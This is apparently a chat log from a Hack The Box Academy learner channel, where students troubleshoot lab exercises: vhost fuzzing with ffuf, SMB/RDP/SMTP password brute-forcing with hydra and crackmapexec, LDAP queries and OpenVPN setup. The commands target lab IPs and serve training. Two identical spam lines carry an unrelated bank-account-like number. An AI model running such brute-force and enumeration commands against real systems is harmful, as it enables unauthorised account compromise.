The answer to the question "What non-default privilege does the htb-student user have?" isn't what I expected. The state of the privilege shows as ||"Disabled"||. So why is the answer that?

The privilege is not commonly used and can be used to be exploited.

No most services do not have a lockout set. To expedite your question you might want to turn to the Internet and find a list of weak passwords. No need to thank me, you're welcome that's the 1 hint I'll give you. Best of luck

hello guys, newb here... I just enrolled for the SIlver plan, and want to unlock the Getting Started module or any module, but I press UNLOCK and nothing happens, sorry if this is not the place to ask this questions... thanks for your help

Someone else was having issues with that the other day, I'm not sure what the resolve was. Try logging out and back in? Else try reaching out to support.

ok thx

idk bro i slapped through darkweb 1000 and nothing, i just googled that and did worst passwords2022 list and still nothing xd

I already said you're welcome I cannot help you any further with your search.

Sorry, was the AD BLOCKER, I'm still very redacted... LMAO

Re-read the shares section of the page you're in carefully.

Can someone help me or give me a hint on this question: 'find through SPL searches against all data the process that started the infection. Answer format: _.ex '”

think like an attacker. then trace to the origin

No way, I swear that wasn't there before.

lmao thanks, i cant believe its on the page, how the shit didnt i find this with 2020 and 2023 200 most common, and darknet 10k 😒 wtf

hm it actually is in 2023-200_most_used_passwords.txt

fml in crackmapexec i forgot to put domain/user

thank god i wont make that mistake again.. id probably cry if i did that in the exam

Lol.. Yeah I certainly missed it myself when I went over it

thanks for making me feel a bit better at least 🤣

I even did a search on the academy and it didn't return for that module

Haha yeah I ran through a few lists as well.

Network Enumeration with Nmap - Host and Port Scanning

is there ever any practical reason we would want to disable ICMP echo requests or ARP pings with -Pn or --disable-arp-ping, or is it just used in this module to illustrate the different scan types?

They're commonly filtered out to block those packets

ah ok, so if nmap doesn't receive replies to those packets, it labels those ports as filtered right?

by memory if nmap cannot determine whether its open or closed it can return filtered

if its firewall blocked it should say filtered

you can use the --reason to get results on the ports

I may be wrong but that's by memory

ok thank you!

👍

has pawnbox acting up today for anyone? it stop/terminates itself after ~10 minutes and then have to respawn it again

Hi all

on attacking common services sql portion. i cant sudo apt install sqsh or run mssql-cli because of its numerous errors.
mssql
fixed import lines where it has called a deprecated library from 3.9, but another error from a function popped up. i tried to download python3.9, but apt can't find it. mssql-cli should be a lost cause, and it's a bigger problem that i somehow can't install python3.9(i can install other packages)

ah i forgot pwnbox existed

I need some help

What is it about?

Could someone give me some help with Information Gathering - Web Edition First question of the virtual host section?

Enumerate the target and find a vHost that contains flag No. 1. Submit the flag value as your answer (in the format HTB{DATA}).

I'm doing ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u http://10.129.226.112 -H "HOST: FUZZ.inlanefreight.htb" -fs 10918

but i'm not getting any hits. What am I doing wrong? Thanks in advance

I've also tried FUZZ.www.inlanefreight.htb as well

hi guys!

seeking home help with server-side attacks skills assessment.

||i have found the url from a javascript file. when i try visit the url. it just displays "are you sure?" and nothing else. ||

is there anything else i'm missing to get the flag?

Edit: I'm blind. lol

the -u flag should be the hostname (aka www.inlanefreight.htb) not the IP.

hmm interesting. Then why does the module course material give ffuf -w ./vhosts -u http://192.168.10.10 -H "HOST: FUZZ.randomtarget.com" -fs 612 as the example for this exercise? Seems wack

Sounds like you didn't actually find it. You can DM me the path and js file name if you want me to confirm it

will do

actually i think that works too

in the pic i took i used the url though

make sure you have www.inlanefreight.htb added to your /etc/hosts file

@cloud urchin Well ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u http://10.129.226.112 -H "HOST: FUZZ.inlanefreight.htb" -fs 10918 didn't get any hits,

but ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u http://www.inlanefreight.htb -H "HOST: FUZZ.inlanefreight.htb" -fs 10918 does give me hits.

and yeah I got both www.inlanefreight.htb and inlanefreight.htb in /etc/hosts. Thanks for the help.

ok so I have a list of subdomains on the target, but not seeing a flag anywhere. Visiting them and using curl on them are producing no results.

Your first command looks correct from what i see, whats the output?

are you visiting the vhosts?

Yeah in my browser and with curl. I'm just getting defualt apache2 ubuntu page

for that first command. Literally nothing. Just the amount of tries it has attempted. No vhosts are shown.

no clue why IP doesnt work, if you have em in /ect/hosts
i see that you got some outputs but cant curl, as far as i remember if you didnt filter the 10918 out you would get a ton of default ubuntu installation pages but you did filter it out. mind sharing your curl command?

iirc for vhosts you'll need to use the domain and not the ip

mine worked with the ffuf IP

but was using pwnbox so maybe thats why it worked for me

I've tried:

||curl -s http://customers.www.inlanefreight.htb -H "Host: customers.www.inlanefreight.htb"
curl -s http://www2.www.inlanefreight.htb
curl http://citrix.www.inlanefreight.htb||

and I'm not using pwnbox, but might jump on it to complete this if I have to lol

huh why are the subdomains before www

what the heck is this

that doesnt look right

i don't understand this

you added to every subdoman a www which isnt correct

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u http://blah.com -H "HOST: FUZZ.blah.com"

you need blah.com in your /etc/hosts

That makes sense. I thought I needed the www because of this

www is already a subdomain, if you want to visit another, you'll need to replace that

subdomain.domain.tld

that's the format for urls

right. I thought I was supposed to find sub domains of the sub domains lol

I'm still not getting any hits with this though. How long do you have to let the wordlist run to get the vhosts?

are you try to fuzz on subdomains for www.inlanefreight.htb or what ?

did you add specifically inlanefreight.htb to your hosts file

if you trying to get access to www.inlanefreight.htb just add it to you /etc/hosts

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u http://inlanefreight.htb -H "HOST: FUZZ.inlanefreight.htb" -fs 10918

yes

maybe the fs is wrong

it was the correct one for me aswell

worked fine for me

you mentioned earlier this also worked for you, add the vhosts you found in your /etc/hosts and visit them for the flags

Aha, I need a lot of heat on the roads for five bucks TR300006400000134032350237

huh?i dont remember adding the subdomain you found to your /etc7hosts?

I did, and all I got was Apache2 Ubuntu Default Page

whats the size of the valid sites?

whats the size of the valid sites?

Aha, I need a lot of heat on the roads for five bucks TR300006400000134032350237

I'm not getting anything 😦

your command is not the same as mine

It doesn't make sense but try With Http://www.inlanefreight.htb

-H.......?

yeah I get hits with http://www.inlanefreight.htb

But as I said before, when I visit these subdomains, I only see the Apache2 Ubuntu Default Page.

show your /etc/hosts

if you have the correct vhosts in /etc/hosts with the same ip as the www.inlanefreight.htb one, it should work

actually don't show your /etc/hosts because that'd probably break rules

but i'm guessing that's the issue, because if you don't set that up then you'll get the default apache page

Got it. I still has the subdomain.www.inlanefreight.htb in my etc/hosts.

Thanks for the help everyone. That took way more time than it should of lol

Hello everyone!
I am here to ask for your support in fixing an OpenVPN error. As shown in the course, when I try to connect using the "academy-regular.ovpn" file, I encounter an error: "WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set."

This occurs when I try to open the file from the downloads folder. When I try to open it without navigating to the folder, it displays the error: "Options error: In [CMD-LINE]:1: Error opening configuration file: academy-regular.ovpn."

I have tried all the solutions from forums, YouTube, Reddit, and even searched for a solution on the TryHackMe forums regarding OpenVPN, but I couldn't resolve it.

I have attempted to connect to all the servers and even changed to TCP 433, but I still couldn't fix it. So, I'm reaching out to ask for your help. What could be the solution? Am I doing something wrong?

I have attempted to connect using both the website and VMware. In my VMware, I'm using Parrot OS HTB.

that looks fine, I don't see any errors about opening the config file

run ifconfig, if you see an ip for tun0 you're good, open another terminal and do your things

Thank you! Let me try and come back agian.

I did as you told, run ifconfig, my ip is still the same but I can see tun0.
Does this mean I am connected? @next bronze

sudo killall openvpn, connect again, then go do a module

After running 'Sudo killall opevpn' and reconnected, I got this:

you are ready to go

try to ping your target

Wow! Let's do this!

Let me try and come back here again.
Thank you @next bronze

yeah you're good

nice troubleshooting skills

fyi if you want to run it outside of the downloads folder, give it the full path, i.e. sudo openvpn /home/user/Downloads/academy-regular.ovpn

I'd recommend doing the Information Security Foundations path

Dang! I'l save this and remember. I am a total newbie and this will help me a lot. Thank you!

as xreous said go for the security foundations paths

@next bronze @limber river Okay! I will do that. Thank you 👍

Doing password attacks, network services
just having a question about RDP, did someone try it with crackmapexe? i saw its not covered in the module but when checking out crackmap it has the possibility?

yeah it can

crowbar probably still better for rdp

hydra works with rdp

did you change the command much? i went through the crackmapexe rdp --help and didnt saw anything important that i would need to change

yea just wanted to go with crackmap through all of em first then with hydra

i didn't use CME for it, i used crowbar

ah ic

ssh and winrm both went flawlesly with crackmap, dont know yet why rdp doesnt function well

btw ~ is the shortcut for your 'home directory' so you can just do ~/Desktop/pass.list or whatever

imagine still using cme

don't mad dog cme

i know but im again out of my country and have to work on this shitty macbook and i have no clue where that button is , i even struggled to find @ xD

well cme isnt worked on anymore so maybe that broke something with rdp, ill use hydra

Hi all! i am doing LDAP module this is the question..What is the domain functional level?
i am doing my query but the answer is wrong..
also tbh 1000 cubes for this module is a theft...

which section is that

also lmao I agree

yeah i thought it was pretty weak for a 1000 cube module..

LDAP Anonymous Bind section

i mean i am using the go version of windapsearch which is only 4 years old

Hi, I just found two flags in one lesson. But the lesson only needs one, does that happen more often? It's about: https://academy.hackthebox.com/module/19/section/108

in the module the tool they recommend is 8 years old

you need to use --functionality

in this version its the metadata is the equivalent

i used ldapsearch-ad.py with -t info and got it

it's supposed to be the year btw, just give it the server version https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/active-directory-functional-levels

Xre0uS' command will work too

they are reusing services(nothing wrong with that) and you maybe got a flag for one of the next section questions, happend to me too

I guess I'll keep a note so I can submit it later haha

Hi again!
I was able to connect with ssh htb student..... but when I type the password it says Permission denied.

Am I missing something?

enter the right password then you can copy and paste

and in the future, include the module and section so that people will know the context

https://forum.hackthebox.com/t/htb-academy-password-attacks/285391

I have problem with last question of module Network Services

Hey. Why i am getting
smb: > ls
NT_STATUS_ACCESS_DENIED listing *

I've found credentials of john... (Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.)

access denied is a permission issue, the user you're using doesn't have permission to do that

But how am i supposed to do it then? I've used bruteforce smb with given pass-user lists and found john credentials. There are no other occurencies

how did you brutce force it?

Though crackmapexec

then you'll need to --continue-on-success or use another tool

Thank you!

even though i cancllled the sub ?

because there are modules i still didnt finish

he said all 100% completed modules belong to you

ok that makes sense

thnx

hey guys, someone up for a little help on "Exploiting Web Vulnerabilities in Thick-Client Applications" section in
"Attacking Common Applications" module please ??

was planning to do the Active Directory Trust Attacks module but the target won't spawn

guess I'm not doing it

the explanation in the module doesn't make sense ...

you bought it ?

yeah I have thousands of cubs to be used

share some cubs , I am poor

xD

just get money

you push me to do bad things

me doing mutated passwords section

got it

Hi there! can someone help with Password attacks medium lab? I've got zip archive from smb share, but when trying to crack the password of it, by using john and multiple password lists with different formats - im just getting nothing

try a mutated list

Poor solutions

hello, I'm new in cybersecurity and im trying to learn through the HTB : academy (path : Information Security Foundations). I like to understand and manipulate tools but in module : "Setting up" there is a lot of things that's seems not mandatory but also usefull. I don't get the point of talking about thoses things but not make it clearly understandable like Tmux (a video of a man just speed running options and his keys binding), modifying bashrc to modify the prompt but writing just after that to keep it simple, talking about command and vps but not explaining how to setup one (just some specific case where it would be usefull were told).
It feels like If i dont get knowledge about that I would skip some important info but it also feels like it s not important. Can someone tell me if I should just going trought like it s ok to not understand it at 100% (sorry bad eng I m a bit confuse about this module)

It's OK 👍

You can't understand everything about hacking

so what the point of doing all that if it's not usefull...

a lot of things you'll need to research yourself if you want to know more, tmux, bashrc and vps could be modules on their own, but they're not essential to finishing the path, they're good information for you to know and explore yourself

thanks for clarification!

Hi guys , anyone who completed the module password attacks that can explain me why my RDP brute force is not working ? :/

Crackmapexe?

I tried these commands , they show output , but only false positives :/

I got 3 out of the 4 flags , just the RDP one is not working , kinda frustating :/

Iirc cme wasnt getting worked on anymore.
So most likely something broke with maybe a new rdp version.
Just dont use cme, use hydra or smthing

Hydra was the same thing :

Just in case , I'm using the list they provided , and I added inside the users found in the sever

Can anyone who has completed the attacking common services easy lab please dm me? I have got the flag but apparently there are two methods and I'd like to understand thhe second one

Whats the output? False positives?

Yea command looks good, worked for me like 3 hours ago(from what i can remember)

With hydra yes, like 4 password available for each user ; using cme and crowbar , no output

You provide a password.list but where is the hash or the hash file it wants to compare with?

Oh nvm now i see it

Have you tried via pwnbox?

No , is there a diference ?

it could help

Ok let me try 🫡

Maybe your internet connection was unstable giving you false positives?

I don't think that can be an issue , i tested in 2 different ( irl) locations as well :

Hey.

hydra -l fiona -P /usr/share/wordlists/rockyou.txt 10.129.59.142 smtp -t 64 -f```

I am trying to get through "Attacking Common Services - Easy". Found username with smtp-enum but now struggling to bruteforce smtp. I've tried rockyou.txt and provided passlist but notjing has shown up. Any hints?

No clue then. I would check out on the pwnbox, since the command looks the same as i used it

sorry

Yes , I'm lauching hydra in pwnbox, because I thought it would be easy ahhaha

No problem , thanks already for helping mister !

You did the last question aswell? Im pretty sure there you find the rdp password aswell